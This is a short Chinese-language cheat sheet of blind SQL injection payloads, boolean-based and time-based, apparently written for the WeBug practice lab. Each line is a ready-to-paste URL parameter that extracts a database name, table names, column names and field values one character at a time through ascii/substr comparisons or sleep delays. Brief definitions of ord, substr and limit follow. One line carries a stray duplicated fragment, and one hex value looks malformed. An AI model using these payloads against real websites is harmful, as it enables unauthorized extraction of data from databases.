布尔盲注:
格式:?id=1' and (ascii(substr((爆表列字段的语句 limit 0,1),1,1)))=100 --+
爆库:?id=1' and ord(substr(database(), 1, 1))=115 --+
爆表:?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))=100 --+
?id=1' and (ascii(substr((select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=0x674657374 limit 0,1),1,1)))=100 --+
爆列:?id=1' and (ascii(substr((select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_SCHEMA=0x74657374(库名) and TABLE_NAME=0x61646d696e(表名) limit 0,1),1,1)))=100 --+ limit 0,1),4,1)))=102 含义:第4个的ascii码是102 所以应该是f
爆字段:?id=1' and (ascii(substr((select group_concat(concat(id,0x20,flag,0x20)) from webug.flag limit 0,1),1,1)))=100 --+
延时注入:
格式:?id=1' and if( (ascii(substr(( 爆表列字段语句 limit 0,1),1,1)))=100 ,sleep(5),0)--+
爆库:?id=1' and if(ord(substr(database(),1,1))=115,sleep(5),0) --+
爆表:?id=1' and if( (ascii(substr((select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=0x674657374(表名) limit 0,1),1,1)))=100 ,sleep(5),0)--+
爆列:?id=1' and if( (ascii(substr(( select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_SCHEMA="webug" and TABLE_NAME="flag" limit 0,1),1,1)))=105 ,sleep(5),0)--+
select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_SCHEMA=0x74657374(库名) and TABLE_NAME=0x61646d696e(表名)
爆字段:?id=1' and if((ascii(substr((select group_concat(concat(id,0x20,flag,0x20)) from webug.flag limit 0,1),1,1)))<100,sleep(5),0)--+
select group_concat(concat(id,0x20,flag,0x20)) from 库.表
ord:返回字符串首个字符的ASCII值
substr:返回截取的字符串 start必须写,length可以不写,默认到字符串结尾
limit:限制查询结果返回的数量
网友评论